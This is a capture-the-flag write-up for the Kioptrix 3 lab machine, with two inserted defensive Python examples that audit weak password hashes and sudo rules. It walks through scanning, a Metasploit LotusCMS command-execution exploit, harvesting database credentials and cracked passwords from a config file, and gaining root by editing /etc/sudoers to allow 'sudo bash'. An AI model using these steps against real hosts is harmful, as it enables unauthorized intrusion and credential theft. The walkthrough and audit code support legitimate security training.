Kioptrix 3 Write-up

It has been a long time since I wrote a write-up. This one is for Kioptrix 3, which you can find here.

Host Discovery

$ nmap -sP 192.168.56.1/24

and we got the IP address: 192.168.56.101.

As explained, you need to add 192.168.56.101 kioptrix3.com to your /etc/hosts.

Fingerprinting

Then, let's find out which services are running on the host.

$ nmap 192.168.56.101 -sV -A 

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-12 20:15 CEST
Nmap scan report for malicious (192.168.56.101)
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds

Quite obviously, let's check this web server!

Reconnaissance

Thanks to Nikto, we found some useful information:

(...)
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
(...)

And with DirBuster:

(...)
Dir found: /gallery/ - 500
File found: /gallery/index.php - 500
File found: /gallery/recent.php - 500
Dir found: /gallery/p.php/ - 500
Dir found: /gallery/g.php/ - 500
Dir found: /gallery/themes/ - 200
(...)

Moreover, by browsing the website, I identified the CMS behind it:

<meta name="keywords" content="LotusCMS" />

Exploitation

Thanks to this information, I looked on Exploit-db for some known vulnerabilities.

Bingo, there were. :-)

I ran Metasploit and exploited this eval() remote command execution. I got a (limited) Meterpreter session on the machine and retrieved several files from the filesystem, such as the configuration file gconfig.php:

<?php
    error_reporting(0);
    /*
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.
    */

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as http://www.yoursite.com/gallery
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

    // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
        echo("A connection to the database couldn't be established: " . mysql_error());
        die();
}else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
        die();
    }else {
        $settings=mysql_query("select * from gallarific_settings");
        if(mysql_num_rows($settings)!=0){
            while($data=mysql_fetch_array($settings)){
                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
            }
        }
    
    }
}

?>

Thanks to those credentials, I was able to access phpMyAdmin and dump all the databases.

I found several hashes:

dreg:0d3eccfb887aabd50f243b3f155c0f85 => Mast3r
loneferret:5badcaf789d3d1d09794d8f021f40f0e => starwars

Moreover, I had the admin’s password: n0t7t1k4.
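Both dumped hashes are 32 hex characters with no salt or algorithm prefix, which is why they fell to a wordlist so quickly. The following is an added example (not part of the write-up) of the two sides of that lesson from a defender's view: a small password-audit routine that classifies a dump and tests unsalted MD5 entries against a short wordlist, next to the storage format that should have been used instead (salted PBKDF2-HMAC-SHA256 from the standard library). The dump text reuses the two user:hash pairs quoted above; the wordlist and the iteration count are constructed values.

```python
import hashlib
import hmac
import os
import re

# Constructed sample: the two user:hash pairs quoted in the write-up.
DUMPED_HASHES = """\
dreg:0d3eccfb887aabd50f243b3f155c0f85
loneferret:5badcaf789d3d1d09794d8f021f40f0e
"""

# Constructed: a tiny audit wordlist, as an internal password-audit would use.
AUDIT_WORDLIST = ["password", "123456", "starwars", "Mast3r", "letmein"]

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_dump(text):
    """Return [(user, hash)] from 'user:hash' lines, skipping blanks."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        entries.append((user, digest.strip().lower()))
    return entries


def classify(digest):
    """32 hex chars with no salt or identifier is raw MD5; '$id$...' is crypt-style."""
    if MD5_RE.match(digest):
        return "unsalted-md5"
    if digest.startswith("$"):
        return "crypt-style"  # $1$, $5$, $6$, $2b$ ... carry an algorithm id and a salt
    return "unknown"


def audit_unsalted_md5(entries, wordlist):
    """Map user -> (status, matched_word). Every candidate costs one MD5 call and,
    with no salt, one precomputed table serves every account at once."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    findings = {}
    for user, digest in entries:
        if classify(digest) != "unsalted-md5":
            findings[user] = ("not-md5", None)
        elif digest in lookup:
            findings[user] = ("weak", lookup[digest])
        else:
            findings[user] = ("md5-unmatched", None)
    return findings


# The fix: a per-user random salt and a deliberately slow KDF.
# PBKDF2_ITERATIONS is a constructed example value.
PBKDF2_ITERATIONS = 600_000


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt$derived_key' with a fresh 16-byte salt."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for user, (status, word) in audit_unsalted_md5(parse_dump(DUMPED_HASHES), AUDIT_WORDLIST).items():
        print(f"{user}: {status}" + (f" ({word})" if word else ""))
    print(hash_password("starwars"))
```

The same wordlist test against the PBKDF2 output would cost 600,000 HMAC rounds per candidate per user, and the random salt means no table can be shared between accounts.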

I managed to log in over SSH with loneferret's credentials.

I checked the files in the home folder and found CompanyPolicy.README:

$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

And then:

$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
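This sudo -l output is exactly what a hardening check should catch before anyone gets this far: an editor running as root can rewrite any file, and the sudoers manual itself notes that negating a command with "!" is not an effective restriction. The following is an added example (not from the write-up) of such a check in Python: it parses sudo -l style output, flags rules that hand out editors, pagers, shells or interpreters as root, and flags negated rules. The sample text reuses the two rules above plus one constructed, narrowly scoped rule so the checker has a non-flagged case.

```python
import os
import re

# Constructed sample: the two rules quoted in the write-up plus one scoped rule.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) /usr/bin/systemctl status apache2
"""

# Programs that, run as root, amount to full root: any editor (arbitrary file
# write), pager with a command escape, shell or interpreter. Matched by
# basename so /usr/local/bin/ht and /usr/bin/vim are treated alike.
EDITOR_OR_SHELL = {
    "ht", "vi", "vim", "nano", "emacs", "ed",
    "less", "more", "man",
    "bash", "sh", "zsh", "dash",
    "python", "python3", "perl", "ruby", "php",
}

# "(runas) TAG: TAG: command args" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Return a list of rule dicts; header lines that do not match are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        cmd = m.group("cmd")
        negated = cmd.startswith("!")
        parts = cmd.lstrip("!").split()
        rules.append({
            "runas": m.group("runas"),
            "tags": tags,
            "negated": negated,
            "command": parts[0],
            "args": parts[1:],
        })
    return rules


def describe(rule):
    """Render a parsed rule back to its sudo -l form for reporting."""
    tags = " ".join(t + ":" for t in sorted(rule["tags"]))
    cmd = ("!" if rule["negated"] else "") + " ".join([rule["command"], *rule["args"]])
    return f"({rule['runas']}) {tags} {cmd}".replace("  ", " ")


def audit_rules(rules):
    """Return [{'severity', 'rule', 'reason'}] for every rule."""
    findings = []
    for r in rules:
        base = os.path.basename(r["command"])
        if r["negated"]:
            sev, why = "medium", ("negated commands are not an effective restriction; "
                                  "list only what is permitted")
        elif base in EDITOR_OR_SHELL:
            sev = "high"
            why = f"{base} as {r['runas']} gives full root"
            if base in {"ht", "vi", "vim", "nano", "emacs", "ed"}:
                why += "; grant sudoedit on specific files instead"
            if "NOPASSWD" in r["tags"]:
                why += " (and without a password)"
        else:
            sev, why = "info", "scoped command"
        findings.append({"severity": sev, "rule": describe(r), "reason": why})
    return findings


if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"[{f['severity']:>6}] {f['rule']}  -  {f['reason']}")
```

Run against the output of sudo -l on each host (or against the sudoers file after visudo -c), the check reports the ht rule as high and the su negation as medium, while the systemctl rule passes as a scoped command.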

Thanks to this, I only had to edit /etc/sudoers and update the entry:

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash

Back to the terminal:

loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:~#

and voilà, I was able to read /root/Congrats.txt.

Nice VM; the ht trick was fun.